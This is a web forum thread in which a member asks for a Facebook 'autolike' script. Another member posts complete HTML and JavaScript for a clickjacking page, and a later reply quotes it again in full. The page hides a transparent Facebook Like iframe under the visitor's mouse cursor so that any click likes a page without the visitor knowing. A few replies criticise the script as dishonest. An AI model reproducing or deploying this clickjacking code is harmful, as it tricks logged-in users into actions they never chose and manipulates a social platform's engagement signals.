Activity Stream
48,167 MEMBERS
62540 ONLINE
besthostingforums On YouTube Subscribe to our Newsletter besthostingforums On Twitter besthostingforums On Facebook besthostingforums On facebook groups

Results 1 to 7 of 7
  1.     
    #1
    Member

    Default Looking for Facebook Autolike Script

    Looking for Facebook Autolike Script (All site visitors will like the facebook page)

    have somebody this script?
    pikerones Reviewed by pikerones on . Looking for Facebook Autolike Script Looking for Facebook Autolike Script (All site visitors will like the facebook page) have somebody this script? Rating: 5

  2.   Sponsored Links

  3.     
    #2
    Member
    Website's:
    sborg.us
    I've got 2 questions for you,

    1. Why would you want the visitors to force-like your page/site?
    2. Have you googled for the script?

    V3g3ta | Halcyon | Abhi

  4.     
    #3
    Member
    Halcyon
    I have 1 question while I will answer yours)))

    why you interested this?

  5.     
    #4
    Respected Member
    Haven't tried this but here it is:
    Code: 
    Facebook Auto Like Script 
     This script is freely available on the internet yet i see so many people selling it
    
    Facebook Auto Like Script - click anywhere on the page and it likes the page in facebook - User must be logged into facebook to work
    
    
    
     Demo : http://i-am-totally-bored.com/facebookautolike.html
    
     Required file : http://i-am-totally-bored.com/jquery-1.4.2.min.js 
    
    
    Code:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Facebook Auto Like Script</title>
    
    <script src="jquery-1.4.2.min.js" type="text/javascript"></script>
    <script type="text/javascript">
    var interval;
            $(function()
    {
        interval=setInterval("updateActiveElement();", 50);
    });
    
    function updateActiveElement()
    {
        if ( $(document.activeElement).attr('id')=="fbframe" ) 
        {
            clearInterval(interval);
            iflag=1; 
        }    
    }
            
            </script>
    </head>
    
    <body>
             
    
            
    <!--page content goes here-->
    <h2>Please click anywhere on the page.</h2>
    
    <p>Now check your facebook wall </p>
    . <img src="http://i-am-totally-bored.com/wp-content/uploads/2010/06/article-1290060-0A_1074762a.jpg" />
            
            
          <!-- end of page content (but don't close your html or body tag here)-->
            
            
    <div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
    
     
    <!--facebook like frame code goes here-->
    
             <iframe src="http://www.facebook.com/plugins************href=http%3A%2F%2Fi-am-totally-bored.com%2F&amp;layout=standard&amp;show_faces=false&amp;width=450&amp;action=like&amp;font=tahoma&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
             
          <!--end facebook like frame code-->
    
        </div>
        
        
          <script>
        var iflag = 0;
        var icontainer = document.getElementById('icontainer');    
        var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
        
        
        
        function mouseFollower(e){
            /*                    DO NOT EDIT THIS                         */
        if (window.event) 
        { // for IE
            icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
            icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
        } 
        else 
        {
            icontainer.style.top = (e.pageY-5)+'px';
            icontainer.style.left = (e.pageX-5)+'px';
        }
    
        }
        document.onmousemove = function(e) {
            if (iflag == 0) {mouseFollower(e);}
        }
    
        </script>
    
    </body>
    </html>

  6.     
    #5
    Member
    oo awsome script lockdown
    ps:not using it nor tried it
    edit: i doubt it works either

  7.     
    #6
    Respected Member
    I hope your site dies...shit, dishonest, evil script. You site/service sucks if people don't like it. Fix that.

  8.     
    #7
    Member
    Quote Originally Posted by Lock Down View Post
    Haven't tried this but here it is:
    Code: 
    Facebook Auto Like Script 
     This script is freely available on the internet yet i see so many people selling it
    
    Facebook Auto Like Script - click anywhere on the page and it likes the page in facebook - User must be logged into facebook to work
    
    
    
     Demo : http://i-am-totally-bored.com/facebookautolike.html
    
     Required file : http://i-am-totally-bored.com/jquery-1.4.2.min.js 
    
    
    Code:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Facebook Auto Like Script</title>
    
    <script src="jquery-1.4.2.min.js" type="text/javascript"></script>
    <script type="text/javascript">
    var interval;
            $(function()
    {
        interval=setInterval("updateActiveElement();", 50);
    });
    
    function updateActiveElement()
    {
        if ( $(document.activeElement).attr('id')=="fbframe" ) 
        {
            clearInterval(interval);
            iflag=1; 
        }    
    }
            
            </script>
    </head>
    
    <body>
             
    
            
    <!--page content goes here-->
    <h2>Please click anywhere on the page.</h2>
    
    <p>Now check your facebook wall </p>
    . <img src="http://i-am-totally-bored.com/wp-content/uploads/2010/06/article-1290060-0A_1074762a.jpg" />
            
            
          <!-- end of page content (but don't close your html or body tag here)-->
            
            
    <div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
    
     
    <!--facebook like frame code goes here-->
    
             <iframe src="http://www.facebook.com/plugins************href=http%3A%2F%2Fi-am-totally-bored.com%2F&amp;layout=standard&amp;show_faces=false&amp;width=450&amp;action=like&amp;font=tahoma&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
             
          <!--end facebook like frame code-->
    
        </div>
        
        
          <script>
        var iflag = 0;
        var icontainer = document.getElementById('icontainer');    
        var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
        
        
        
        function mouseFollower(e){
            /*                    DO NOT EDIT THIS                         */
        if (window.event) 
        { // for IE
            icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
            icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
        } 
        else 
        {
            icontainer.style.top = (e.pageY-5)+'px';
            icontainer.style.left = (e.pageX-5)+'px';
        }
    
        }
        document.onmousemove = function(e) {
            if (iflag == 0) {mouseFollower(e);}
        }
    
        </script>
    
    </body>
    </html>
    can you explain how it works ?

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. [Selling] Facebook Script AutoLike & Auto Accept amount of Friends.
    By lalo3 in forum Completed Transactions
    Replies: 11
    Last Post: 15th Apr 2012, 02:10 PM
  2. [Selling] Facebook Like Script - $7 USD
    By Terror in forum Completed Transactions
    Replies: 3
    Last Post: 19th May 2011, 01:14 AM
  3. Facebook like Script
    By Spartan in forum Webmaster Discussion
    Replies: 3
    Last Post: 4th May 2011, 04:55 PM
  4. Promotion of facebook like script
    By John in forum Webmaster Discussion
    Replies: 1
    Last Post: 2nd Apr 2011, 10:10 PM
  5. Facebook like script
    By John in forum Webmaster Resources
    Replies: 10
    Last Post: 29th Mar 2011, 06:03 PM

Tags for this Thread

BE SOCIAL